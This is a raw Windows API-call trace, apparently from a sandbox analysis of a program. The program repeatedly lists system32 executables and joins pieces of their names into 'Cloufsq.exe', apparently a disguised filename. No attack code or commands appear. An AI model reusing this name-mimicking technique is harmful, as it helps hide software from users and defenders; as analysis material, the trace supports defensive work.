	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] StrRChrW (lpStart="regini.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindClose (in: hFindFile=0x503bd0 | out: hFindFile=0x503bd0) returned 1
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetLastError () returned 0x0
	[0088.582] GetSystemDirectoryW (in: lpBuffer=0x507d80, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.582] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.582] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 0x503c50
	[0088.582] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.582] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.582] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] StrRChrW (lpStart="CloudNotifications.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.583] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.584] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.584] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.584] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.584] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.584] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.584] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.584] FindNextFileW (in: hFindFile=0x503c50, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.584] StrRChrW (lpStart="fsquirt.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.584] GetSystemDirectoryW (in: lpBuffer=0x507d80, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.584] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.584] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 0x503b90
	[0088.584] StrRChrW (lpStart="gpscript.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.585] StrRChrW (lpStart="sdchange.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.585] GetSystemDirectoryW (in: lpBuffer=0x507d80, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.585] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.585] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 0x503b90
	[0088.585] StrRChrW (lpStart="BackgroundTransferHost.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.585] StrRChrW (lpStart="cliconfg.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.585] lstrcatW (in: lpString1="Cloufsq", lpString2=".exe" | out: lpString1="Cloufsq.exe") returned="Cloufsq.exe"
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetLastError () returned 0x0
	[0088.586] GetSystemDirectoryW (in: lpBuffer=0x507d80, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.586] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.586] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 0x503b90
	[0088.586] StrRChrW (lpStart="control.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.587] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.588] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
